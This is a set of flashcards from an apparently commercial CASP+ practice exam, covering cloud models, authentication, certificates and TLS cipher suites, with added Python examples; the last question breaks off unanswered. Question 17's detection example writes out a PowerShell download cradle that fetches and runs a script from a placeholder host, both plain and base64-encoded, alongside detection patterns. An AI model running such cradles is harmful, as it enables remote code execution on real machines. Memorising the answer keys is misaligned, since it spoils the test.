(Udemy CASP+ (CAS-004): Practice Exam #1 - Results) Flashcards

1
Q

A vulnerability scan has returned the following results:

What best describes the meaning of this output?

A. Windows Defender has a known exploit that must be resolved or patched
B. Connecting to the host using a null session allows enumeration of the share names on the host
C. There is an unknown bug in an Apache server with no Bugtraq ID
D. There is no CVE present, so this is a false positive caused by Apache running on a Windows server

A

B. Connecting to the host using a null session allows enumeration of the share names on the host

Explanation:
These vulnerability scan results show an enumeration of open Windows shares on the scanned host, which is also running Apache. The enumeration shows that three share names (print$, files, Temp) were found using a null session connection, that is, an SMB session established with no username and no password. There is no CVE associated with this finding, but it is not a false positive: not all vulnerabilities have a CVE, and misconfigurations such as anonymous share enumeration usually do not. Nothing in this output concerns Windows Defender, so that option is incorrect. Bugtraq IDs are a different type of identification number that was issued for vulnerabilities by SecurityFocus; generally, if there is a CVE, there is also a Bugtraq ID. Both the CVE and Bugtraq ID fields being blank is therefore not suspicious for a null session enumeration result.

2
Q

Your boss is looking for a recommendation for a cloud solution that will allow both onsite systems and cloud services to work together seamlessly. What type of cloud model should you recommend?

A. Public Cloud
B. Community Cloud
C. Hybrid Cloud
D. Private Cloud

A

C. Hybrid Cloud

Explanation:
A hybrid cloud model allows for the seamless integration of both onsite and cloud services to the end-user simultaneously. Hybrid clouds can be cost-efficient, flexible, easy to migrate to a complete cloud solution in the future, and require less maintenance than completely onsite options. As with all cloud options, the contents must be properly secured due to the elastic storage nature of all cloud solutions and the possibility of data remnants. A public cloud contains services offered by third-party providers over the public Internet and is available to anyone who wants to use or purchase them. They may be free or sold on-demand, allowing customers to pay only per usage for the CPU cycles, storage, or bandwidth they consume. A private cloud contains services offered either over the Internet or a private internal network and only to select users instead of the general public. A community cloud is a collaborative effort in which infrastructure is shared between several organizations from a specific community with common concerns (security, compliance, jurisdiction, etc.), whether managed internally or by a third party and hosted internally or externally.

3
Q

A new alert has been distributed throughout the information security community regarding a critical Apache vulnerability. What action could you take to ONLY identify the known vulnerability?

A. Perform an unauthenticated vulnerability scan on all servers in the environment
B. Perform a web vulnerability scan on all servers in the environment
C. Perform an authenticated scan on all web servers in the environment
D. Perform a scan for the specific vulnerability on all web servers

A

D. Perform a scan for the specific vulnerability on all web servers

Explanation:
Since you wish to check for only the known vulnerability, you should scan for that specific vulnerability on all web servers. All web servers are chosen because Apache is a web server application. While performing an authenticated scan of all web servers or performing a web vulnerability scan of all servers would also find these vulnerabilities, it is a much larger scope. It would waste time and processing power by conducting these scans instead of properly scoping the scans based on your needs. Performing unauthenticated vulnerability scans on all servers is also too large in scope (all servers) while also being less effective (unauthenticated scan).

4
Q

You have been asked to recommend a capability to monitor all of the traffic entering and leaving the corporate network’s default gateway. Additionally, the company’s CIO requests to block certain content types before they leave the network based on operational priorities. Which of the following solutions should you recommend to meet these requirements?

A. Install a firewall on the router’s internal interface and a NIDS on the router’s external interface
B. Configure IP filtering on the internal and external interfaces of the router
C. Install a NIPS on the internal interface and a firewall on the external interface of the router
D. Installation of a NIPS on both the internal and external interfaces of the router

A

C. Install a NIPS on the internal interface and a firewall on the external interface of the router

Explanation:
Due to the requirements provided, you should install a NIPS on the gateway router’s internal interface and a firewall on its external interface. The firewall on the external interface filters the bulk of unwanted inbound traffic before it reaches the network. The NIPS then inspects the traffic entering and leaving the network and protects it using signature-based or behavior-based analysis; because it sits inline on the internal interface, custom signatures written by the security team can block the specified content types before they leave the network. An inline NIPS is not built to absorb the full volume of raw Internet traffic the way a firewall is, and if it is overwhelmed it may fail open (passing traffic uninspected) or fail closed (dropping all traffic), so placing it on the external interface, or on both interfaces, is a poor choice. IP filtering on both interfaces of the router cannot monitor traffic or block it based on content type, since it only acts on addresses and ports. Finally, a NIDS on the external interface alone can only monitor and alert; it cannot provide the content blocking that was requested.

5
Q

Which of the following security policies could help detect fraudulent cases that occur even when other security controls are already in place?

A. Mandatory vacations
B. Separation of duties
C. Least privilege
D. Dual control

A

A. Mandatory vacations

Explanation:
Mandatory vacation policies require employees to take time away from their job and help to detect fraud or malicious activities. Even if other controls such as separation of duties, least privilege, and dual control are used, an employee could collude with others to conduct fraud. By utilizing mandatory vacation policies, this fraud can often be discovered since a new person will be conducting the duties assigned to the person on vacation. Separation of duties is the concept of having more than one person required to complete a particular task to prevent fraud and error. Dual control, instead, requires both people to act together. For example, a nuclear missile system uses dual control and requires two people to each turn a different key simultaneously to allow for a missile launch to occur. Least privilege is the concept and practice of restricting access rights for users, accounts, and computing processes to only those resources required to perform routine, legitimate activities.

6
Q

What type of cloud service would allow you to provide a cloud-based application to your employees using their smartphones?

A. IaaS
B. SaaS
C. DaaS
D. PaaS

A

B. SaaS

Explanation:
Software as a service (SaaS) allows users to connect to and use cloud-based apps over the Internet. Common examples are email, calendaring, and office tools. SaaS provides a complete software solution that you purchase on a pay-as-you-go basis from a cloud service provider. You rent the use of an app for your organization, and your users connect to it over the Internet, usually with a web browser or a mobile app, which is why it fits employees using smartphones. All of the underlying infrastructure, middleware, app software, and app data are located in the service provider’s data center. The service provider manages the hardware and software and, with the appropriate service agreement, ensures the availability and the security of the app and your data. SaaS allows your organization to get up and running quickly with an app at minimal upfront cost. Platform as a Service (PaaS) is a cloud computing service that enables consumers to rent fully configured systems that are set up for specific purposes, such as developing and hosting their own applications. Infrastructure as a Service (IaaS) is a cloud computing service that enables a consumer to outsource computing equipment purchases and the running of their own data center. Desktop as a Service (DaaS) provides a full virtualized desktop environment from within a cloud-based service. This is also known as VDI (Virtual Desktop Infrastructure) and is becoming common in large enterprises focused on increasing their security and minimizing their operational expenses.

7
Q

Dion Training is using a cloud service provider under an Infrastructure as a Service (IaaS) model. Assuming there is a shared responsibility model between the two organizations, which of the following is MOST likely the security responsibility of the cloud service provider under this IaaS model?

A. User identity management
B. Security of isolation between tenants
C. Protection of operating systems
D. Use and configuration of encryption

A

B. Security of isolation between tenants

Explanation:
The shared responsibility model identifies how responsibility for implementing security is divided between the customer and the cloud service provider (CSP) as applications, data, and workloads are transitioned into a cloud platform. Using an Infrastructure as a Service (IaaS) model provides hardware hosted at a provider facility using the provider’s physical security controls and utilities. Identifying the boundary between customer and cloud provider responsibilities, in terms of security, is imperative for reducing the risk of introducing vulnerabilities into your environment. In this scenario, since an IaaS model was chosen, the cloud service provider is responsible for the security of the cloud infrastructure, including resource isolation between tenants. Dion Training, on the other hand, is responsible for user identity management, protection of the operating systems it deploys on the rented infrastructure, and the use and configuration of encryption, including the protection of the encryption keys.

8
Q

While conducting a penetration test against an organization, you gained access to the CEO’s account. You log in as the CEO and send the following email:

Which of the following attacks are you utilizing in this scenario?

A. BEC Attack
B. Whaling attack
C. Deauthentication attack
D. Smishing attack

A

A. BEC Attack

Explanation:
A business email compromise (BEC) attack is a form of social engineering in which the attacker impersonates a high-level executive or directly takes over their email account. The attacker then sends an email to elicit personnel to take action on their behalf. In this example, the attacker is impersonating the company’s CEO by sending an email to the financial personnel requesting that they send a money transfer for what appears to be a legitimate service. This example also uses the urgency and authority motivation factors to convince the employee to take action. Whaling is the related phishing technique that targets an executive as the victim rather than impersonating one.

9
Q

A technician is testing a new web-based tool capable of generating an automatic teller machine (ATM) cash and service availability reports. A consortium of financial institutions developed the web-based tool. Which of the following cloud delivery models is being described in this scenario?

A. Public
B. Hybrid
C. Private
D. Community

A

D. Community

Explanation:
A community cloud is a collaborative effort in which infrastructure is shared between several organizations from a specific community with common concerns (security, compliance, jurisdiction, etc.), whether managed internally or by a third party and hosted internally or externally. The scenario described is a community cloud-created tool by the banking industry. A public cloud contains services offered by third-party providers over the public Internet and is available to anyone who wants to use or purchase them. They may be free or sold on-demand, allowing customers to pay only per usage for the CPU cycles, storage, or bandwidth they consume. A private cloud contains services offered either over the Internet or a private internal network and only to select users instead of the general public. A hybrid cloud uses a mix of on-premises, private cloud, and third-party, public cloud services with orchestration between these platforms. This typically involves a connection from an on-premises data center to a public cloud.

10
Q

Which of the following should a domain administrator utilize to BEST protect their endpoints from buffer overflow attacks?

A. Ensure ASLR is enabled on the endpoint
B. Install an anti-malware tool on the endpoint
C. Conduct input validation on all web input forms
D. Conduct bound checking before executing a program

A

A. Ensure ASLR is enabled on the endpoint

Explanation:
Address Space Layout Randomization (ASLR) randomizes the positions of a process’s key memory regions (stack, heap, and the loaded executable and libraries) each time it runs, so that an attacker cannot rely on code or data being at a predetermined address. It is a buffer overflow mitigation rather than a prevention: the overflow may still occur, but the attacker cannot reliably redirect execution to a known location, which is why ASLR is normally paired with DEP/NX and with binaries compiled as position-independent code. It can be undermined by a memory-disclosure bug that leaks an address, so it should be treated as one layer of defense rather than the whole answer. ASLR must be supported by the underlying operating system and enabled for the binary for it to work. Every version of Windows since Windows Vista supports ASLR, as does every version of Mac OS X since 10.5 Leopard in 2007. At this point, ASLR is commonplace in Windows, macOS, iOS, Android, Linux, and BSD operating systems. Input validation and bounds checking are developer-side controls that a domain administrator cannot apply to third-party code already running on the endpoints, and an anti-malware tool does not address the overflow itself.

11
Q

An electronics store was recently the victim of a robbery where an employee was injured, and some property was stolen. The store’s IT department hired an external supplier to expand its network to include a physical access control system. The system has video surveillance, intruder alarms, and remotely monitored locks using an appliance-based system. Which of the following long-term cybersecurity risks might occur based on these actions?
A. There are no new risks due to the install and the company has a strong physical security posture
B. These devices should be isolated from the rest of the enterprise network
C. These devices are insecure and should be isolated from the internet
D. These devices should be scanned for viruses before installation

A

B. These devices should be isolated from the rest of the enterprise network

Explanation:
While the physical security posture of the company has been improved by adding the cameras, alarms, and locks, this appliance-based system may pose additional risks to the store’s network. Specialized technology and appliance-based systems rarely receive security updates at the same rate as regular servers or endpoints. These devices need to be on a network to ensure that their network functions can continue, but they don’t necessarily need to be on the enterprise production network. A good option would be to set up a parallel network that is physically or logically isolated from the enterprise network (for example, a dedicated VLAN whose firewall rules permit only the remote-monitoring traffic) and install the video cameras, alarms, and locks on that one. These devices cannot be isolated from the internet without compromising their functions, such as allowing remote monitoring of the system and locks. The devices should be scanned for viruses before installation, but that is a short-term consideration and doesn’t protect them long-term.

12
Q

You are conducting a routine vulnerability scan of a server when you find a vulnerability. You locate a patch for the vulnerability on the software vendor’s website. What should you do next?

A. Establish continuous monitoring
B. Submit a request for change using the change management process
C. Download and install the patch immediately
D. Start the incident response process

A

B. Submit a request for change using the change management process

Explanation:
OBJ-2.3: Before any change to a baseline occurs, a Request for Change should be submitted. This submission will start the change management process within your organization. Once approved, the patch should be tested in a staging environment, installed on the production server, and then the server should be rescanned to ensure the vulnerability no longer exists. In this scenario, no incident response is being performed since this vulnerability is found during a routine vulnerability scan.

13
Q

Which of the following identity and access management controls relies upon using a certificate-based authentication mechanism?

A. Smart card
B. HOTP
C. Proximity Card
D. TOTP

A

A. Smart card

Explanation:
Smart cards, PIV, and CAC devices are used as an identity and access management control. These devices contain a digital certificate embedded in the card (PIV/CAC) that is presented to the system when the card is inserted into a smart card reader. When combined with a PIN, the smart card provides multi-factor authentication (something you have and something you know). The PIN unlocks the card, allowing the certificate to be presented and the card’s private key, which never leaves the card, to sign the authentication challenge. HOTP and TOTP are one-time password schemes based on a shared secret rather than a certificate, and a proximity card only presents a static identifier to the reader.

14
Q

Which of the following authentication methods is an open-source solution for single sign-on across organizational boundaries on the web?

A. TACACS+
B. Kerberos
C. RADIUS
D. Shibboleth

A

D. Shibboleth

Explanation:
OBJ-1.5: Shibboleth is a standards-based, open-source software package for single sign-on across or within organizational boundaries on the web. It allows sites to make informed authorization decisions for individual access to protected online resources in a privacy-preserving manner. Shibboleth utilizes SAML to provide this federated single sign-on and attribute exchange framework.

15
Q

Dion Training is setting up a new website called YourCyberPath.com. Dion Training wants to install the same digital certificate on YourCyberPath.com and DionTraining.com. Which of the following digital certificate types should they utilize to meet this requirement?

A. Wildcard
B. General purpose
C. Extended validation
D. Multidomain

A

D. Multidomain

Explanation:
OBJ-3.5: A multidomain certificate is a single SSL/TLS digital certificate that can be used to secure multiple, different domain names. For example, if you want to install the same certificate on diontraining.com and yourcyberpath.com, you will need to register a multidomain certificate. A wildcard certificate contains the wildcard character (*) in its domain name field and allows the digital certificate to be used for any number of subdomains. For example, the wildcard certificate of *.diontraining.com can be used for members.diontraining.com, cart.diontraining.com, and support.diontraining.com. General Purpose or Domain Validation (DV) digital certificates prove the ownership of a particular domain by responding to an email to the authorized domain contact or by publishing a text record to the domain’s DNS records. Extended Validation (EV) digital certificates are subject to a process that requires more rigorous checks on the subject’s legal identity and control over the domain or software being signed. A major drawback to EV certificates is that they cannot be issued for a wildcard domain.
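The distinction between a multidomain and a wildcard certificate comes down to how a client matches the hostname it is connecting to against the certificate’s Subject Alternative Names. The following is an added example, not code from the flashcards or from Dion Training; the SAN lists are constructed to mirror the question, and the matching rules follow RFC 6125 as modern clients implement them.

```python
# Added example (not from the flashcards): how a TLS client decides whether a
# certificate's Subject Alternative Names (SANs) cover the host it is connecting
# to. The SAN lists below are constructed to mirror the question: a multidomain
# certificate listing both domains, and a wildcard certificate for one domain.

def hostname_matches_san(hostname, san):
    """Return True if the dNSName entry `san` covers `hostname`.

    Rules (RFC 6125 section 6.4.3 as implemented by modern clients):
      - matching is case-insensitive and ignores a trailing dot;
      - a wildcard is only honoured as the entire left-most label (*.example.com);
      - the wildcard matches exactly one label, so *.example.com covers
        www.example.com but not example.com and not a.b.example.com;
      - a wildcard directly under a top-level domain (*.com) is refused.
    """
    host_labels = hostname.lower().rstrip(".").split(".")
    san_labels = san.lower().rstrip(".").split(".")
    if "*" not in san:
        return host_labels == san_labels
    if san_labels[0] != "*" or any("*" in label for label in san_labels[1:]):
        return False                      # partial or non-leading wildcard
    if len(san_labels) < 3:
        return False                      # *.com is never acceptable
    if len(host_labels) != len(san_labels):
        return False                      # the wildcard covers one label only
    return host_labels[1:] == san_labels[1:]


def certificate_covers(hostname, sans):
    """True if any SAN on the certificate covers the requested hostname."""
    return any(hostname_matches_san(hostname, san) for san in sans)


# Constructed SAN lists for the two certificate types discussed above.
MULTIDOMAIN_SANS = [
    "diontraining.com", "www.diontraining.com",
    "yourcyberpath.com", "www.yourcyberpath.com",
]
# Wildcard certificates normally carry the bare domain as a second SAN because
# the wildcard alone would not match it.
WILDCARD_SANS = ["*.diontraining.com", "diontraining.com"]


def which_certificate(hostname):
    """Report which of the two constructed certificates would be accepted for `hostname`."""
    return {
        "multidomain": certificate_covers(hostname, MULTIDOMAIN_SANS),
        "wildcard": certificate_covers(hostname, WILDCARD_SANS),
    }


if __name__ == "__main__":
    for host in ("yourcyberpath.com", "members.diontraining.com", "a.b.diontraining.com"):
        print(host, which_certificate(host))
```

Running it shows why the question’s answer is the multidomain certificate: the wildcard for *.diontraining.com covers any single-level subdomain of diontraining.com but never yourcyberpath.com, while the multidomain certificate covers both sites only because each name is listed explicitly.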

16
Q

Dion Consulting Group is helping an organization build a new Security Operations Center. The organization wants to create a centralized repository that contains logs from all the network devices, servers, and endpoints so cybersecurity analysts can search the repository and conduct threat hunting. Which of the following types of sensors or systems should you implement to centralize the logging and event data from across the enterprise network into one place?

A. Host based intrusion detection (HIDS)
B. File integrity monitoring (FIM)
C. Security and information event management (SIEM)
D. Data Loss Prevention (DLP)

A

C. Security and information event management (SIEM)

Explanation:
OBJ-1.1: While all of these options can provide logging information, only a SIEM works to consolidate various sources of logs and event information into a single repository. Security information and event management system (SIEM) is a solution that provides real-time or near-real-time analysis of security alerts generated by network hardware and applications. File integrity monitoring (FIM) is a type of software that reviews system files to ensure that they have not been tampered with. Host-based intrusion detection systems (HIDS) provide threat detection by monitoring an operating system’s logs, processes, services, files, systems, and the Windows Registry where applicable. Data Loss Prevention (DLP) is a software solution designed to detect and prevent sensitive information from being used, transmitted, or stored inappropriately.

17
Q

A penetration tester issued the following command on a victimized Windows system:
Based on this command, which of the following exploits is the penetration tester MOST likely trying to conduct?

A. Download and execute a remote script
B. Exploiting unquoted service paths
C. Scheduling a task for persistence
D. Conduct DLL hijacking

A

A. Download and execute a remote script

Explanation:
This command launches PowerShell without loading the PowerShell profile (-nop) and in a hidden window (-w hidden). The text after -c (-Command) is the command or script block PowerShell executes before exiting. Invoke-Expression (IEX) is handed the output of (New-Object Net.WebClient).DownloadString(URL), which fetches the content at the URL as a string; IEX then evaluates that string as PowerShell code, so the remote script runs in memory without ever being written to disk. This is the classic PowerShell download cradle. Unquoted service paths, scheduled tasks, and DLL hijacking are privilege-escalation or persistence techniques; none of them is carried out by feeding a downloaded string to IEX.
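From the defender’s side, the same indicators the explanation walks through (-nop, -w hidden, IEX, a WebClient download) are what a detection rule looks for in process-creation logs. The following is an added example, not code from the flashcards or from Dion Training: the log lines, hostnames, user names and the URL (example.invalid) are constructed, and the third line shows the same cradle hidden behind -EncodedCommand, which the routine decodes before scanning.

```python
# Added example (not from the flashcards): a small detection routine that flags
# PowerShell download cradles like the one in this question in process-creation
# log lines. The log lines, hostnames and the URL (example.invalid) are all
# constructed for this example.
import base64
import re
from dataclasses import dataclass

# Each indicator on its own is common in legitimate automation; the combination
# (and especially IEX fed by a web download) is what makes a cradle.
INDICATORS = {
    "no_profile":        re.compile(r"(?i)(?:^|\s)-(?:nop|noprofile)\b"),
    "hidden_window":     re.compile(r"(?i)-w(?:indowstyle)?\s+hidden\b"),
    "invoke_expression": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
    "web_download":      re.compile(r"(?i)\b(?:downloadstring|downloadfile|invoke-webrequest|iwr|net\.webclient)\b"),
}
# -EncodedCommand takes the script as base64 of its UTF-16LE bytes; attackers use it
# to hide the IEX/DownloadString text from naive string matching.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
LOG_LINE = re.compile(r'host=(?P<host>\S+) .*?image=(?P<image>\S+) cmdline="(?P<cmdline>.*)"\s*$')


@dataclass
class Verdict:
    hits: list
    decoded: object   # decoded -EncodedCommand payload, or None
    suspicious: bool


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_powershell_cmdline(cmdline):
    """Scan a PowerShell command line (and any encoded payload inside it) for cradle indicators."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    if decoded is not None:
        hits.append("encoded_command")
    cradle = {"invoke_expression", "web_download"} <= set(hits)
    return Verdict(hits=hits, decoded=decoded, suspicious=cradle or len(hits) >= 3)


def triage(log_lines):
    """Return [(host, Verdict)] for every powershell.exe launch judged suspicious."""
    flagged = []
    for line in log_lines:
        match = LOG_LINE.search(line)
        if not match or not match.group("image").lower().endswith("powershell.exe"):
            continue
        verdict = score_powershell_cmdline(match.group("cmdline"))
        if verdict.suspicious:
            flagged.append((match.group("host"), verdict))
    return flagged


# Constructed sample log. The third line carries the same cradle as the second,
# but hidden behind -enc; the encoder below is only used to build the sample.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b.ps1')".encode("utf-16-le")
).decode("ascii")
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [
    'host=WS01 user=jdoe image=' + _PS + r' cmdline="powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"',
    'host=WS02 user=asmith image=' + _PS + ' cmdline="powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a.ps1\')"',
    'host=WS03 user=bkim image=' + _PS + ' cmdline="powershell.exe -w hidden -enc ' + _ENCODED + '"',
    r'host=WS04 user=svc image=C:\Windows\System32\cmd.exe cmdline="cmd.exe /c whoami"',
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_LOG):
        print(host, verdict.hits)
```

The benign backup script on WS01 uses -NoProfile too, which is why the rule scores on the combination rather than on any single switch; the WS03 line would be missed by a plain string match on "IEX", which is the point of decoding -enc before scanning.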

18
Q

Which party in a federation provides services to members of the federation?

A. SSO
B. RP
C. SAML
D. IdP

A

B. RP

Explanation:
Relying parties (RPs) provide services to members of a federation. An identity provider (IdP) provides identities, makes assertions about those identities, and releases information about the identity holders. The Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between an identity provider and a service provider (SP), also called a relying party (RP). Single sign-on (SSO) is an authentication scheme that allows a user to log in with a single ID and password to any of several related yet independent software systems across a federation. SAML and SSO are not parties, so they cannot be the right answer to this question.

19
Q

Which of the following cipher suites does not support the more secure ephemeral key agreement mode?

A. TLS_RSA_WITH_AES_256_CBC_SHA256
B. TLS_AES_256_GCM_SHA384
C. TLS_CHACHA20_POLY1305_SHA256
D. ECDHE_RSA_AES128_GCM_SHA256

A

A. TLS_RSA_WITH_AES_256_CBC_SHA256

Explanation:
TLS_RSA_WITH_AES_256_CBC_SHA256 uses the RSA key exchange, which is not ephemeral. In RSA key exchange, the client encrypts the pre-master secret with the server’s long-term public key, and the session keys are derived from that pre-master secret. The problem with this method is that if the server’s private key is ever compromised, every recorded session that used it can be decrypted after the fact. This suite also uses CBC mode with a separate HMAC rather than an AEAD cipher, a construction with a history of padding-oracle weaknesses in TLS.

The other three cipher suites all provide forward secrecy:

ECDHE_RSA_AES128_GCM_SHA256 (registered as TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256): This uses the Elliptic Curve Diffie-Hellman Ephemeral (ECDHE) key exchange, with RSA used only to sign the handshake. A fresh key pair is generated for each session, so even if the server’s private key is compromised in the future, previously recorded sessions cannot be decrypted.

TLS_AES_256_GCM_SHA384 and TLS_CHACHA20_POLY1305_SHA256: These are TLS 1.3 cipher suites. A TLS 1.3 suite name specifies only the AEAD cipher (AES-256-GCM or ChaCha20-Poly1305) and the hash used for the HKDF key schedule and the handshake transcript (SHA-384 or SHA-256); message authentication comes from the AEAD tag. The key exchange is negotiated separately from the suite and, apart from the optional PSK-only resumption mode, is always an ephemeral (EC)DHE exchange, because TLS 1.3 removed static RSA and static Diffie-Hellman key exchange entirely. These suites therefore always provide forward secrecy in a full handshake.

In summary, TLS_RSA_WITH_AES_256_CBC_SHA256 is the only option that does not use an ephemeral key agreement.
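Reading the key exchange out of a suite name is mechanical once you know the naming scheme, and it is a useful check to run over a server’s configured suite list. The following is an added example, not code from the flashcards or from Dion Training; it accepts IANA names, TLS 1.3 names, and the hyphenated OpenSSL form, and the suite list it classifies is the question’s four options.

```python
# Added example (not from the flashcards): classify TLS cipher-suite names by
# key exchange and forward secrecy. Accepts IANA names (TLS_..._WITH_...),
# TLS 1.3 names, and the OpenSSL hyphenated form; the suite list is the
# question's four options.

# TLS 1.3 suites name only the AEAD cipher and the HKDF/transcript hash. The key
# exchange is negotiated separately and (outside PSK-only resumption) is always
# an ephemeral (EC)DHE exchange, so these suites always give forward secrecy.
TLS13_SUITES = {
    "TLS_AES_128_GCM_SHA256", "TLS_AES_256_GCM_SHA384",
    "TLS_CHACHA20_POLY1305_SHA256", "TLS_AES_128_CCM_SHA256", "TLS_AES_128_CCM_8_SHA256",
}
EPHEMERAL_KX = {"ECDHE", "DHE"}            # fresh key pair per session
STATIC_KX = {"RSA", "ECDH", "DH", "PSK"}   # long-term key (or shared secret) only


def classify_cipher_suite(name):
    """Return version, key exchange, forward-secrecy and AEAD properties of a suite."""
    n = name.strip().upper().replace("-", "_")
    if n in TLS13_SUITES:
        return {"version": "1.3", "key_exchange": "(EC)DHE", "forward_secrecy": True, "aead": True}
    if n.startswith("TLS_"):
        n = n[4:]
    # TLS 1.2 and earlier: <KX>[_<AUTH>]_WITH_<CIPHER>_<MAC>, or the same without WITH
    kx_part = n.split("_WITH_", 1)[0]
    kx = kx_part.split("_")[0]
    if kx not in EPHEMERAL_KX | STATIC_KX:
        raise ValueError("unrecognised key exchange in cipher suite: " + name)
    aead = any(marker in n for marker in ("_GCM_", "_CCM", "CHACHA20_POLY1305"))
    return {
        "version": "<=1.2",
        "key_exchange": kx,
        "forward_secrecy": kx in EPHEMERAL_KX,
        "aead": aead,
    }


def suites_without_forward_secrecy(suites):
    """Filter a suite list down to those a compromised server key would expose retroactively."""
    return [s for s in suites if not classify_cipher_suite(s)["forward_secrecy"]]


OPTIONS = [
    "TLS_RSA_WITH_AES_256_CBC_SHA256",
    "TLS_AES_256_GCM_SHA384",
    "TLS_CHACHA20_POLY1305_SHA256",
    "ECDHE_RSA_AES128_GCM_SHA256",
]

if __name__ == "__main__":
    for suite in OPTIONS:
        print(suite, classify_cipher_suite(suite))
    print("no forward secrecy:", suites_without_forward_secrecy(OPTIONS))
```

The classifier treats the key-exchange token (the first label before _WITH_) as the only thing that decides forward secrecy; the authentication algorithm that may follow it (RSA or ECDSA in ECDHE_RSA / ECDHE_ECDSA) only signs the handshake and does not affect it.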

20
Q

Keith wants to validate the application file that he downloaded from the vendor of the application. Which of the following should he compare against the file to verify the integrity of the downloaded application?

A. Private key of the file
B. Public key of the file
C. File size and file creation date
D. MD5 or SHA1 hash digest of the file

A

D. MD5 or SHA1 hash digest of the file

Explanation:
Keith should compute a hash of the downloaded file and compare it against the digest published by the vendor for that file. If the digests match, the file was not modified or corrupted in transit during the download. The other options are insufficient, since integrity checking relies on comparing digests: a public or private key is not assigned to a single file and does not provide integrity on its own (a digital signature made with the vendor’s private key would, but that is not what the options list), and file size and creation date are metadata that an attacker can trivially preserve, so they are a much weaker check than a hash digest. Two caveats a practitioner should keep in mind: MD5 and SHA-1 are no longer collision resistant, so vendors should publish SHA-256 or stronger digests; and a digest hosted on the same server as the download only detects transit corruption, not a compromised server, because an attacker who replaces the file can replace the published hash too. A digest obtained over a separate trusted channel, or a signed manifest, closes that gap.
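The comparison itself is usually done against a checksum manifest in the line format that sha256sum and md5sum write. The following is an added example, not code from the flashcards or from Dion Training: the file contents and the manifest are constructed in memory (in practice the manifest comes from the vendor), and the verifier flags mismatches, missing files, and manifests that still rely on MD5 or SHA-1.

```python
# Added example (not from the flashcards): verifying a download against a
# checksum manifest in the line format written by sha256sum/md5sum. The file
# contents and the manifest are constructed in memory here; in practice the
# manifest comes from the vendor.
import hashlib
import hmac

# Digest length (hex chars) tells us which algorithm the vendor used.
ALGORITHM_BY_HEX_LENGTH = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}
COLLISION_WEAK = {"md5", "sha1"}


def digest_of(data, algorithm, chunk_size=64 * 1024):
    """Hex digest of bytes or of a binary file object, hashed in chunks."""
    h = hashlib.new(algorithm)
    if isinstance(data, (bytes, bytearray)):
        h.update(data)
    else:
        for chunk in iter(lambda: data.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_manifest(text):
    """Parse 'HEXDIGEST  filename' lines ('*' before the name marks binary mode)."""
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, filename = line.partition(" ")
        filename = filename.lstrip(" *")
        malformed = (
            not filename
            or len(digest) not in ALGORITHM_BY_HEX_LENGTH
            or any(c not in "0123456789abcdefABCDEF" for c in digest)
        )
        if malformed:
            raise ValueError("malformed manifest line: " + raw)
        entries[filename] = digest.lower()
    return entries


def verify(manifest_text, files):
    """files: {filename: bytes}. Returns {filename: status} where status is
    'ok', 'MISMATCH', 'missing', or 'ok (weak: <alg>)' when the vendor used MD5/SHA-1."""
    results = {}
    for filename, expected in parse_manifest(manifest_text).items():
        if filename not in files:
            results[filename] = "missing"
            continue
        algorithm = ALGORITHM_BY_HEX_LENGTH[len(expected)]
        actual = digest_of(files[filename], algorithm)
        # compare_digest avoids timing leaks; harmless here, essential when the
        # comparison happens server-side against attacker-supplied input.
        if not hmac.compare_digest(actual, expected):
            results[filename] = "MISMATCH"
        elif algorithm in COLLISION_WEAK:
            results[filename] = "ok (weak: " + algorithm + ")"
        else:
            results[filename] = "ok"
    return results


# Constructed "download" and the manifest the vendor would publish for it.
PRISTINE = b"MZ\x90\x00" + bytes(range(256)) * 4        # stand-in for an installer
LEGACY = b"#!/bin/sh\necho legacy tool\n"
MANIFEST = (
    "# SHA256SUMS (constructed)\n"
    + hashlib.sha256(PRISTINE).hexdigest() + "  app-1.0.bin\n"
    + hashlib.md5(LEGACY).hexdigest() + " *legacy.sh\n"
)

if __name__ == "__main__":
    print(verify(MANIFEST, {"app-1.0.bin": PRISTINE, "legacy.sh": LEGACY}))
    print(verify(MANIFEST, {"app-1.0.bin": PRISTINE + b"\x00"}))
```

A single appended byte is enough to flip the result to MISMATCH, which is what makes the digest a stronger check than size or timestamp; the "weak" annotation is there so an MD5-only manifest is noticed rather than silently accepted.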

21
Q

Dion Training provides its team members with a mobile device so that they can respond to questions when they are out of the office. To minimize the risk of a data leak, the organization has decided to purchase each employee a new iPhone, configure it using a mobile device management (MDM) solution, and use a containerized app to process and store all corporate data on the device. Each employee signs an AUP that states they can use the device for work-related and personal use, but the device and any data stored on it remain the property of Dion Training. Which of the following policies BEST describes Dion Training’s mobile device deployment model?

A. COBO
B. CYOD
C. COPE
D. BYOD

A

C. COPE

Explanation:
Corporate Owned Personally Enabled (COPE) is a mobile device deployment model where the device remains the property of the organization, but certain personal use, such as private email, social networking, and web browsing, is also permitted. Corporate Owned Business Only (COBO) is a mobile device deployment model that provides the employee with a corporate-owned device that may only be used for official work functions and purposes. Choose Your Own Device (CYOD) is a mobile device deployment model where employees are offered a selection of corporate devices for work and, optionally, private use. Bring Your Own Device (BYOD) is a mobile device deployment model that facilitates the use of personally owned devices to access corporate networks and data.

22
Q

Ryan needs to verify the installation of a critical Windows patch on his organization’s workstations. Which method would be the most efficient to validate the current patch status for all of the organization’s Windows 10 workstations?

